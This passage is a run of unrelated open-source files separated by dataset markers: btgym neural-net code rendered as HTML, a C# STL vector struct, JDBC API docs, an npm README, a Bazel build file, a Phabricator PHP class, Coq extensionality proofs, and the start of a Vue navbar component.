class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="p">[</span><span class="n">size_z</span><span class="p">,</span> <span class="n">size_z</span><span class="p">],</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># Oversized noise generator:</span> <span class="c1">#eps = tf.random_normal(shape=[max_batch_size, half_size_z], mean=0., stddev=1.)</span> <span class="n">eps</span> <span class="o">=</span> <span class="n">tf</span><span 
class="o">.</span><span class="n">random_normal</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="p">[</span><span class="n">max_batch_size</span><span class="p">,</span> <span class="n">size_z</span><span class="p">],</span> <span class="n">mean</span><span class="o">=</span><span class="mf">0.</span><span class="p">,</span> <span class="n">stddev</span><span class="o">=</span><span class="mf">1.</span><span class="p">)</span> <span class="n">eps</span> <span class="o">=</span> <span class="n">eps</span><span class="p">[:</span><span class="n">tf</span><span class="o">.</span><span class="n">shape</span><span class="p">(</span><span class="n">z</span><span class="p">)[</span><span class="mi">0</span><span class="p">],:]</span> <span class="c1"># Get sample z ~ Q(z|X):</span> <span class="n">z_sampled</span> <span class="o">=</span> <span class="n">mu</span> <span class="o">+</span> <span class="n">tf</span><span class="o">.</span><span class="n">exp</span><span class="p">(</span><span class="n">log_sigma</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="o">*</span> <span class="n">eps</span> <span class="c1"># D_KL(Q(z|X) || P(z|X)):</span> <span class="c1"># TODO: where is sum?!</span> <span class="n">d_kl</span> <span class="o">=</span> <span class="mf">0.5</span> <span class="o">*</span> <span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">exp</span><span class="p">(</span><span class="n">log_sigma</span><span class="p">)</span> <span class="o">+</span> <span class="n">tf</span><span class="o">.</span><span class="n">square</span><span class="p">(</span><span class="n">mu</span><span class="p">)</span> <span class="o">-</span> <span class="mf">1.</span> <span class="o">-</span> <span class="n">log_sigma</span><span class="p">)</span> <span class="c1"># Reshape back and feed to decoder:</span> <span class="n">z_sampled_dec</span> <span 
class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">linear</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">z_sampled</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;dec_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">)</span> <span class="n">decoder_layers</span> <span class="o">=</span> <span class="n">conv2d_decoder</span><span class="p">(</span> <span class="n">z</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">z_sampled_dec</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span><span class="p">]),</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">layer_shapes</span><span class="o">=</span><span class="n">shapes</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">resize_method</span><span 
class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">decoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">return</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z_sampled</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="n">d_kl</span></div> <div class="viewcode-block" id="KernelMonitor"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.KernelMonitor">[docs]</a><span class="k">class</span> <span class="nc">KernelMonitor</span><span class="p">():</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Visualises convolution filters learnt for specific layer.</span> <span class="sd"> Source: https://blog.keras.io/how-convolutional-neural-networks-see-the-world.html</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">conv_input</span><span class="p">,</span> <span class="n">layer_output</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Args:</span> <span class="sd"> conv_input: convolution stack input tensor</span> <span class="sd"> layer_output: tensor holding output of layer of interest from stack</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="bp">self</span><span class="o">.</span><span class="n">idx</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">placeholder</span><span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">int32</span><span class="p">,</span> <span 
class="n">name</span><span class="o">=</span><span class="s1">&#39;kernel_index&#39;</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span> <span class="o">=</span> <span class="n">conv_input</span> <span class="bp">self</span><span class="o">.</span><span class="n">layer_output</span> <span class="o">=</span> <span class="n">layer_output</span> <span class="c1"># Build a loss function that maximizes the activation</span> <span class="c1"># of the n-th filter of the layer considered:</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_loss</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">reduce_mean</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">layer_output</span><span class="p">[:,</span> <span class="p">:,</span> <span class="p">:,</span> <span class="bp">self</span><span class="o">.</span><span class="n">idx</span><span class="p">])</span> <span class="c1"># Gradient of the input picture wrt this loss:</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">gradients</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">vis_loss</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="c1"># Normalization trick:</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span> <span class="o">/=</span> <span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">reduce_mean</span><span class="p">(</span><span 
class="n">tf</span><span class="o">.</span><span class="n">square</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span><span class="p">)))</span> <span class="o">+</span> <span class="mf">1e-5</span><span class="p">)</span> <span class="k">def</span> <span class="nf">_iterate</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sess</span><span class="p">,</span> <span class="n">signal</span><span class="p">,</span> <span class="n">kernel_index</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Returns the loss and grads for specified kernel given the input signal</span> <span class="sd"> Args:</span> <span class="sd"> sess: tf.Session object</span> <span class="sd"> signal: input signal to convolution stack</span> <span class="sd"> kernel_index: filter number in layer considered</span> <span class="sd"> Returns:</span> <span class="sd"> loss and gradients values</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">return</span> <span class="n">sess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="bp">self</span><span class="o">.</span><span class="n">vis_loss</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span><span class="p">],</span> <span class="p">{</span><span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span><span class="p">:</span> <span class="n">signal</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">idx</span><span class="p">:</span> <span class="n">kernel_index</span><span class="p">})</span> <div class="viewcode-block" id="KernelMonitor.fit"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.KernelMonitor.fit">[docs]</a> <span class="k">def</span> <span 
class="nf">fit</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sess</span><span class="p">,</span> <span class="n">kernel_index</span><span class="p">,</span> <span class="n">step</span><span class="o">=</span><span class="mf">1e-3</span><span class="p">,</span> <span class="n">num_steps</span><span class="o">=</span><span class="mi">40</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Learns input signal that maximizes the activation of given kernel.</span> <span class="sd"> Args:</span> <span class="sd"> sess: tf.Session object</span> <span class="sd"> kernel_index: filter number of interest</span> <span class="sd"> step: gradient ascent step size</span> <span class="sd"> num_steps: number of steps to fit</span> <span class="sd"> Returns:</span> <span class="sd"> learnt signal as np.array</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="c1"># Start from some noise:</span> <span class="n">signal</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">([</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="mi">1</span><span class="p">:])</span> <span class="c1"># Run gradient ascent:</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">num_steps</span><span class="p">):</span> <span class="n">loss_value</span><span class="p">,</span> <span class="n">grads_value</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span 
class="n">_iterate</span><span class="p">(</span><span class="n">sess</span><span class="p">,</span> <span class="n">signal</span><span class="p">,</span> <span class="n">kernel_index</span><span class="p">)</span> <span class="n">signal</span> <span class="o">+=</span> <span class="n">grads_value</span> <span class="o">*</span> <span class="n">step</span> <span class="k">return</span> <span class="n">signal</span></div></div> </pre></div> </div> <div class="articleComments"> </div> </div> <footer> <hr/> <div role="contentinfo"> <p> &copy; Copyright 2017, 2018, Andrew Muzikin. </p> </div> Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. </footer> </div> </div> </section> </div> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT:'../../../../', VERSION:'0.0.7', COLLAPSE_INDEX:false, FILE_SUFFIX:'.html', HAS_SOURCE: true, SOURCELINK_SUFFIX: '.txt' }; </script> <script type="text/javascript" src="../../../../_static/jquery.js"></script> <script type="text/javascript" src="../../../../_static/underscore.js"></script> <script type="text/javascript" src="../../../../_static/doctools.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/javascript" src="../../../../_static/js/theme.js"></script> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.StickyNav.enable(); }); </script> </body> </html>
{ "pile_set_name": "Github" }
using System;
using UnityEngine;

namespace Parabox.Stl
{
    /// <summary>
    /// Value type mirroring UnityEngine.Vector3 for STL import/export.
    /// Equality is approximate (component-wise Mathf.Approximately) so that
    /// vectors differing only by float noise compare equal.
    /// NOTE(review): GetHashCode quantizes components by k_Resolution while
    /// Equals uses Mathf.Approximately, so two approximately-equal vectors
    /// near a quantization boundary can hash to different buckets — confirm
    /// callers (e.g. hash-based vertex de-duplication) tolerate this.
    /// </summary>
    struct StlVector3 : IEquatable<StlVector3>
    {
        // Scale applied to each component before hashing.
        const float k_Resolution = 10000f;

        public float x;
        public float y;
        public float z;

        public StlVector3(Vector3 v)
        {
            x = v.x;
            y = v.y;
            z = v.z;
        }

        public StlVector3(float x, float y, float z)
        {
            this.x = x;
            this.y = y;
            this.z = z;
        }

        public static explicit operator Vector3(StlVector3 vec)
        {
            return new Vector3(vec.x, vec.y, vec.z);
        }

        public static explicit operator StlVector3(Vector3 vec)
        {
            return new StlVector3(vec);
        }

        /// <summary>Component-wise approximate equality.</summary>
        public bool Equals(StlVector3 other)
        {
            return Mathf.Approximately(x, other.x)
                && Mathf.Approximately(y, other.y)
                && Mathf.Approximately(z, other.z);
        }

        public override bool Equals(object obj)
        {
            // A null or foreign object is never equal to a value of this type.
            return obj is StlVector3 && Equals((StlVector3) obj);
        }

        public override int GetHashCode()
        {
            // https://stackoverflow.com/questions/720177/default-implementation-for-object-gethashcode/720282#720282
            unchecked
            {
                int result = 27;
                result = result * 13 + (x * k_Resolution).GetHashCode();
                result = result * 13 + (y * k_Resolution).GetHashCode();
                result = result * 13 + (z * k_Resolution).GetHashCode();
                return result;
            }
        }

        public static bool operator ==(StlVector3 a, StlVector3 b)
        {
            return a.Equals(b);
        }

        public static bool operator !=(StlVector3 a, StlVector3 b)
        {
            return !(a == b);
        }
    }
}
{ "pile_set_name": "Github" }
--- description: "supportsGroupByUnrelated Method (SQLServerDatabaseMetaData)" title: "supportsGroupByUnrelated Method (SQLServerDatabaseMetaData) | Microsoft Docs" ms.custom: "" ms.date: "01/19/2017" ms.prod: sql ms.prod_service: connectivity ms.reviewer: "" ms.technology: connectivity ms.topic: conceptual apiname: - "SQLServerDatabaseMetaData.supportsGroupByUnrelated" apilocation: - "sqljdbc.jar" apitype: "Assembly" ms.assetid: 455fe02e-3877-409b-8281-8e0491acd3e8 author: David-Engel ms.author: v-daenge --- # supportsGroupByUnrelated Method (SQLServerDatabaseMetaData) [!INCLUDE[Driver_JDBC_Download](../../../includes/driver_jdbc_download.md)] Retrieves whether this database supports using a column that is not in the SELECT statement in a GROUP BY clause. ## Syntax ``` public boolean supportsGroupByUnrelated() ``` ## Return Value **true** if supported. Otherwise, **false**. ## Exceptions [SQLServerException](../../../connect/jdbc/reference/sqlserverexception-class.md) ## Remarks This supportsGroupByUnrelated method is specified by the supportsGroupByUnrelated method in the java.sql.DatabaseMetaData interface. ## See Also [SQLServerDatabaseMetaData Methods](../../../connect/jdbc/reference/sqlserverdatabasemetadata-methods.md) [SQLServerDatabaseMetaData Members](../../../connect/jdbc/reference/sqlserverdatabasemetadata-members.md) [SQLServerDatabaseMetaData Class](../../../connect/jdbc/reference/sqlserverdatabasemetadata-class.md)
{ "pile_set_name": "Github" }
# list-item

[![NPM version](https://img.shields.io/npm/v/list-item.svg)](https://www.npmjs.com/package/list-item) [![Build Status](https://img.shields.io/travis/jonschlinkert/list-item.svg)](https://travis-ci.org/jonschlinkert/list-item)

> Generate a single formatted list item, allowing you to easily generate lists with proper indentation, bullets, numbers or other leading characters.

- [Install](#install)
- [Usage](#usage)
- [Examples](#examples)
- [API](#api)
- [Related projects](#related-projects)
- [Running tests](#running-tests)
- [Contributing](#contributing)
- [Author](#author)
- [License](#license)

_(TOC generated by [verb](https://github.com/verbose/verb))_

## Install

Install with [npm](https://www.npmjs.com/)

```sh
$ npm i list-item --save
```

## Usage

```js
var listitem = require('list-item');
```

## Examples

**Basic list**

Generate a list using default bullets and indentation:

```js
var listitem = require('list-item');
var li = listitem();

var res = '';
['a', 'b', 'c', 'd', 'e'].forEach(function (ele, i) {
  res += li(i, ele) + '\n';
});
```

Results in:

```
- a
  * b
    + c
      - d
        * e
```

**Roman numerals**

Generate roman numerals in increments of 10.

```js
var listitem = require('list-item');
var romanize = require('romanize');

// specify `chars` to be passed to expand-range (lib),
// and use the callback to modify generated numerals

var li = listitem({chars: '1..100..10'}, function (ch) {
  return romanize(ch) + '.';
});

// generate a formatted list!
var res = '';
['a', 'b', 'c', 'd', 'e'].forEach(function (ele, i) {
  res += li(i, ele) + '\n';
});
```

Results in:

```
I. a
  XI. b
    XXI. c
      XXXI. d
        XLI. e
```

## API

### [listitem](index.js#L47)

Returns a function to generate a plain-text/markdown list-item, allowing options to be cached for subsequent calls.

**Params**

* `options` **{Object}**: pass options to customize list item characters, indentation, etc.
* `options.nobullet` **{Boolean}**: Pass true if you only want the list item and indentation, but no bullets.
* `options.indent` **{String}**: The amount of leading indentation to use. default is ``. * `options.chars` **{String|Array}**: If a string is passed, [expand-range](https://github.com/jonschlinkert/expand-range) will be used to generate an array of bullets (visit [expand-range](https://github.com/jonschlinkert/expand-range) to see all options.) Or directly pass an array of bullets, numbers, letters or other characters to use for each list item. Default `['-', '*', '+']` * `fn` **{Function}**: pass a function [expand-range](https://github.com/jonschlinkert/expand-range) to modify the bullet for an item as it's generated. See the [examples](#examples). * `returns` **{String}**: returns a formatted list item **Example** ```js var li = listitem(options); li(0, 'Level 0 list item'); //=> '- Level 0 list item' li(1, 'Level 1 list item'); //=> ' * Level 1 list item' li(2, 'Level 2 list item'); //=> ' + Level 2 list item' ``` ## Related projects * [deromanize](https://www.npmjs.com/package/deromanize): Convert roman numerals to arabic numbers (useful for books, outlines, documentation, slide decks, etc) | [homepage](https://github.com/jonschlinkert/deromanize) * [expand-range](https://www.npmjs.com/package/expand-range): Fast, bash-like range expansion. Expand a range of numbers or letters, uppercase or lowercase. See… [more](https://www.npmjs.com/package/expand-range) | [homepage](https://github.com/jonschlinkert/expand-range) * [fill-range](https://www.npmjs.com/package/fill-range): Fill in a range of numbers or letters, optionally passing an increment or multiplier to… [more](https://www.npmjs.com/package/fill-range) | [homepage](https://github.com/jonschlinkert/fill-range) * [randomatic](https://www.npmjs.com/package/randomatic): Generate randomized strings of a specified length, fast. 
Only the length is necessary, but you… [more](https://www.npmjs.com/package/randomatic) | [homepage](https://github.com/jonschlinkert/randomatic) * [romanize](https://www.npmjs.com/package/romanize): Convert numbers to roman numerals (useful for books, outlines, documentation, slide decks, etc) | [homepage](https://github.com/jonschlinkert/romanize) * [to-regex-range](https://www.npmjs.com/package/to-regex-range): Returns a regex-compatible range from two numbers, min and max. Useful for creating regular expressions… [more](https://www.npmjs.com/package/to-regex-range) | [homepage](https://github.com/jonschlinkert/to-regex-range) ## Running tests Install dev dependencies: ```sh $ npm i -d && npm test ``` ## Contributing Pull requests and stars are always welcome. For bugs and feature requests, [please create an issue](https://github.com/jonschlinkert/list-item/issues/new). ## Author **Jon Schlinkert** * [github/jonschlinkert](https://github.com/jonschlinkert) * [twitter/jonschlinkert](http://twitter.com/jonschlinkert) ## License Copyright © 2015 [Jon Schlinkert](https://github.com/jonschlinkert) Released under the MIT license. *** _This file was generated by [verb](https://github.com/verbose/verb) on December 20, 2015._
{ "pile_set_name": "Github" }
# Targets in this package default to workspace-wide visibility.
package(default_visibility = ["//visibility:public"])

load(
    "@io_bazel_rules_go//go:def.bzl",
    "go_library",
)

# Go library for the wardle "fischer" registry of the sample apiserver.
# Built from etcd.go and strategy.go; depends only on apimachinery/apiserver
# vendored packages plus the sample-apiserver's own api and registry packages.
go_library(
    name = "go_default_library",
    srcs = [
        "etcd.go",
        "strategy.go",
    ],
    importpath = "k8s.io/sample-apiserver/pkg/registry/wardle/fischer",
    deps = [
        "//vendor/k8s.io/apimachinery/pkg/fields:go_default_library",
        "//vendor/k8s.io/apimachinery/pkg/labels:go_default_library",
        "//vendor/k8s.io/apimachinery/pkg/runtime:go_default_library",
        "//vendor/k8s.io/apimachinery/pkg/util/validation/field:go_default_library",
        "//vendor/k8s.io/apiserver/pkg/endpoints/request:go_default_library",
        "//vendor/k8s.io/apiserver/pkg/registry/generic:go_default_library",
        "//vendor/k8s.io/apiserver/pkg/registry/generic/registry:go_default_library",
        "//vendor/k8s.io/apiserver/pkg/storage:go_default_library",
        "//vendor/k8s.io/apiserver/pkg/storage/names:go_default_library",
        "//vendor/k8s.io/sample-apiserver/pkg/apis/wardle:go_default_library",
        "//vendor/k8s.io/sample-apiserver/pkg/registry:go_default_library",
    ],
)

# Source-tree filegroups; tagged "automanaged", i.e. maintained by tooling —
# do not edit these by hand.
filegroup(
    name = "package-srcs",
    srcs = glob(["**"]),
    tags = ["automanaged"],
    visibility = ["//visibility:private"],
)

filegroup(
    name = "all-srcs",
    srcs = [":package-srcs"],
    tags = ["automanaged"],
)
{ "pile_set_name": "Github" }
<?php

/**
 * Wraps a single parsed fulltext search token, tracking whether the token
 * was discarded from the query (too short, or a stopword) and rendering it
 * as a colored tag for the search UI.
 */
final class PhabricatorFulltextToken extends Phobject {

  private $token;
  private $isShort;
  private $isStopword;

  public function setToken(PhutilSearchQueryToken $token) {
    $this->token = $token;
    return $this;
  }

  public function getToken() {
    return $this->token;
  }

  /**
   * A token takes part in the actual query only if it was not discarded as
   * too short or as a stopword.
   */
  public function isQueryable() {
    return !$this->getIsShort() && !$this->getIsStopword();
  }

  public function setIsShort($is_short) {
    $this->isShort = $is_short;
    return $this;
  }

  public function getIsShort() {
    return $this->isShort;
  }

  public function setIsStopword($is_stopword) {
    $this->isStopword = $is_stopword;
    return $this;
  }

  public function getIsStopword() {
    return $this->isStopword;
  }

  /**
   * Render this token as a tag: grey for ignored (short/stopword) tokens,
   * otherwise colored by the token's operator. Ignored tokens and
   * substring/exact searches also get an explanatory tooltip.
   */
  public function newTag() {
    $token = $this->getToken();

    $tip = null;
    $icon = null;

    // Prefix function tokens with the function name, e.g. "title: foo".
    $name = $token->getValue();
    $function = $token->getFunction();
    if ($function !== null) {
      $name = pht('%s: %s', $function, $name);
    }

    if ($this->getIsShort()) {
      $shade = PHUITagView::COLOR_GREY;
      $tip = pht('Ignored Short Word');
    } else if ($this->getIsStopword()) {
      $shade = PHUITagView::COLOR_GREY;
      $tip = pht('Ignored Common Word');
    } else {
      $operator = $token->getOperator();
      switch ($operator) {
        case PhutilSearchQueryCompiler::OPERATOR_NOT:
          $shade = PHUITagView::COLOR_RED;
          $icon = 'fa-minus';
          break;
        case PhutilSearchQueryCompiler::OPERATOR_SUBSTRING:
          $tip = pht('Substring Search');
          $shade = PHUITagView::COLOR_VIOLET;
          break;
        case PhutilSearchQueryCompiler::OPERATOR_EXACT:
          $tip = pht('Exact Search');
          $shade = PHUITagView::COLOR_GREEN;
          break;
        case PhutilSearchQueryCompiler::OPERATOR_PRESENT:
          // Presence/absence tags show the field name instead of the value.
          $name = pht('Field Present: %s', $function);
          $shade = PHUITagView::COLOR_GREEN;
          break;
        case PhutilSearchQueryCompiler::OPERATOR_ABSENT:
          $name = pht('Field Absent: %s', $function);
          $shade = PHUITagView::COLOR_RED;
          break;
        default:
          $shade = PHUITagView::COLOR_BLUE;
          break;
      }
    }

    $tag = id(new PHUITagView())
      ->setType(PHUITagView::TYPE_SHADE)
      ->setColor($shade)
      ->setName($name);

    if ($tip !== null) {
      Javelin::initBehavior('phabricator-tooltips');
      $tag
        ->addSigil('has-tooltip')
        ->setMetadata(
          array(
            'tip' => $tip,
          ));
    }

    if ($icon !== null) {
      $tag->setIcon($icon);
    }

    return $tag;
  }

}
{ "pile_set_name": "Github" }
(************************************************************************)
(*         *   The Coq Proof Assistant / The Coq Development Team       *)
(*  v      *   INRIA, CNRS and contributors - Copyright 1999-2018       *)
(* <O___,, *       (see CREDITS file for the list of authors)           *)
(*   \VV/  **************************************************************)
(*    //   *    This file is distributed under the terms of the         *)
(*         *     GNU Lesser General Public License Version 2.1          *)
(*         *     (see LICENSE file for the text of the license)         *)
(************************************************************************)

(** Some facts and definitions about extensionality

We investigate the relations between the following extensionality principles

- Functional extensionality
- Equality of projections from diagonal
- Unicity of inverse bijections
- Bijectivity of bijective composition

Table of contents

1. Definitions

2. Functional extensionality <-> Equality of projections from diagonal

3. Functional extensionality <-> Unicity of inverse bijections

4. Functional extensionality <-> Bijectivity of bijective composition

*)

Set Implicit Arguments.

(**********************************************************************)
(** * Definitions *)

(** Being an inverse: [g] undoes [f] and conversely *)

Definition is_inverse A B f g := (forall a:A, g (f a) = a) /\ (forall b:B, f (g b) = b).

(** The diagonal over A and the one-one correspondence with A *)

Record Delta A := { pi1:A; pi2:A; eq:pi1=pi2 }.

Definition delta {A} (a:A) := {|pi1 := a; pi2 := a; eq := eq_refl a |}.

Arguments pi1 {A} _.
Arguments pi2 {A} _.

(** Both projections agree on any element of the diagonal *)

Lemma diagonal_projs_same_behavior : forall A (x:Delta A), pi1 x = pi2 x.
Proof.
  destruct x as (a1,a2,Heq); assumption.
Qed.

(** [pi1] (resp. [pi2]) is an inverse of [delta] *)

Lemma diagonal_inverse1 : forall A, is_inverse (A:=A) delta pi1.
Proof.
  split; [trivial|]; destruct b as (a1,a2,[]); reflexivity.
Qed.

Lemma diagonal_inverse2 : forall A, is_inverse (A:=A) delta pi2.
Proof.
  split; [trivial|]; destruct b as (a1,a2,[]); reflexivity.
Qed.

(** Functional extensionality *)

Local Notation FunctionalExtensionality :=
  (forall A B (f g : A -> B), (forall x, f x = g x) -> f = g).

(** Equality of projections from diagonal *)

Local Notation EqDeltaProjs := (forall A, pi1 = pi2 :> (Delta A -> A)).

(** Unicity of bijection inverse *)

Local Notation UniqueInverse :=
  (forall A B (f:A->B) g1 g2, is_inverse f g1 -> is_inverse f g2 -> g1 = g2).

(** Bijectivity of bijective composition: precomposition with [f] *)

Definition action A B C (f:A->B) := (fun h:B->C => fun x => h (f x)).

Local Notation BijectivityBijectiveComp :=
  (forall A B C (f:A->B) g,
   is_inverse f g -> is_inverse (A:=B->C) (action f) (action g)).

(**********************************************************************)
(** * Functional extensionality <-> Equality of projections from diagonal *)

Theorem FunctExt_iff_EqDeltaProjs : FunctionalExtensionality <-> EqDeltaProjs.
Proof.
  split.
  - intros FunExt *; apply FunExt, diagonal_projs_same_behavior.
  - intros EqProjs **; change f with (fun x => pi1 {|pi1:=f x; pi2:=g x; eq:=H x|}).
    rewrite EqProjs; reflexivity.
Qed.

(**********************************************************************)
(** * Functional extensionality <-> Unicity of bijection inverse *)

(** Forward direction: two inverses agree pointwise, hence are equal *)

Lemma FunctExt_UniqInverse : FunctionalExtensionality -> UniqueInverse.
Proof.
  intros FunExt * (Hg1f,Hfg1) (Hg2f,Hfg2).
  apply FunExt.
  intros; congruence.
Qed.

(** Backward direction goes through [EqDeltaProjs], using that [pi1] and
    [pi2] are both inverses of [delta] *)

Lemma UniqInverse_EqDeltaProjs : UniqueInverse -> EqDeltaProjs.
Proof.
  intros UniqInv *.
  apply UniqInv with delta; [apply diagonal_inverse1 | apply diagonal_inverse2].
Qed.

Theorem FunctExt_iff_UniqInverse : FunctionalExtensionality <-> UniqueInverse.
Proof.
  split.
  - apply FunctExt_UniqInverse.
  - intro; apply FunctExt_iff_EqDeltaProjs, UniqInverse_EqDeltaProjs; trivial.
Qed.

(**********************************************************************)
(** * Functional extensionality <-> Bijectivity of bijective composition *)

Lemma FunctExt_BijComp : FunctionalExtensionality -> BijectivityBijectiveComp.
Proof.
  intros FunExt * (Hgf,Hfg). split; unfold action.
  - intros h; apply FunExt; intro b; rewrite Hfg; reflexivity.
  - intros h; apply FunExt; intro a; rewrite Hgf; reflexivity.
Qed.

(** Conversely, bijectivity of composition gives uniqueness of inverses,
    hence functional extensionality by [FunctExt_iff_UniqInverse] *)

Lemma BijComp_FunctExt : BijectivityBijectiveComp -> FunctionalExtensionality.
Proof.
  intros BijComp.
  apply FunctExt_iff_UniqInverse. intros * H1 H2.
  destruct BijComp with (C:=A) (1:=H2) as (Hg2f,_).
  destruct BijComp with (C:=A) (1:=H1) as (_,Hfg1).
  rewrite <- (Hg2f g1).
  change g1 with (action g1 (fun x => x)).
  rewrite -> (Hfg1 (fun x => x)).
  reflexivity.
Qed.
{ "pile_set_name": "Github" }
<template>
  <header class="navbar">
    <SidebarButton @toggle-sidebar="$emit('toggle-sidebar')"/>

    <router-link
      :to="$localePath"
      class="home-link"
    >
      <img
        class="logo"
        v-if="$site.themeConfig.logo"
        :src="$withBase($site.themeConfig.logo)"
        :alt="$siteTitle"
      >
    </router-link>

    <div
      class="links"
      :style="linksWrapMaxWidth ? { 'max-width': linksWrapMaxWidth + 'px' } : {}"
    >
      <AlgoliaSearchBox
        v-if="isAlgoliaSearch"
        :options="algolia"
      />
      <SearchBox v-else-if="$site.themeConfig.search !== false && $page.frontmatter.search !== false"/>
      <NavLinks class="can-hide"/>
    </div>
  </header>
</template>

<script>
import AlgoliaSearchBox from '@AlgoliaSearchBox'
import SearchBox from '@SearchBox'
import SidebarButton from '@theme/components/SidebarButton.vue'
import NavLinks from '@theme/components/NavLinks.vue'

/**
 * Site navbar: logo, search box and nav links. Caps the width of the link
 * area on desktop so it does not overlap the rest of the navbar.
 */
export default {
  components: {SidebarButton, NavLinks, SearchBox, AlgoliaSearchBox},

  data() {
    return {
      // Max width (px) for the .links wrapper, or null for no cap (mobile).
      linksWrapMaxWidth: null
    }
  },

  mounted() {
    const MOBILE_DESKTOP_BREAKPOINT = 719 // refer to config.styl
    const NAVBAR_VERTICAL_PADDING = parseInt(css(this.$el, 'paddingLeft')) + parseInt(css(this.$el, 'paddingRight'))

    // Recompute the width available to the links: no cap below the mobile
    // breakpoint; otherwise navbar width minus padding and the site-name
    // width (the siteName ref may be absent in this template — guarded).
    this.handleLinksWrapWidth = () => {
      if (document.documentElement.clientWidth < MOBILE_DESKTOP_BREAKPOINT) {
        this.linksWrapMaxWidth = null
      } else {
        this.linksWrapMaxWidth = this.$el.offsetWidth - NAVBAR_VERTICAL_PADDING
          - (this.$refs.siteName && this.$refs.siteName.offsetWidth || 0)
      }
    }
    this.handleLinksWrapWidth()
    window.addEventListener('resize', this.handleLinksWrapWidth, false)
  },

  beforeDestroy() {
    // Bug fix: the resize handler registered in mounted() was never removed,
    // leaking a listener (and retaining this component) on every destroy.
    window.removeEventListener('resize', this.handleLinksWrapWidth, false)
  },

  computed: {
    // Algolia config, with locale-specific config taking precedence.
    algolia() {
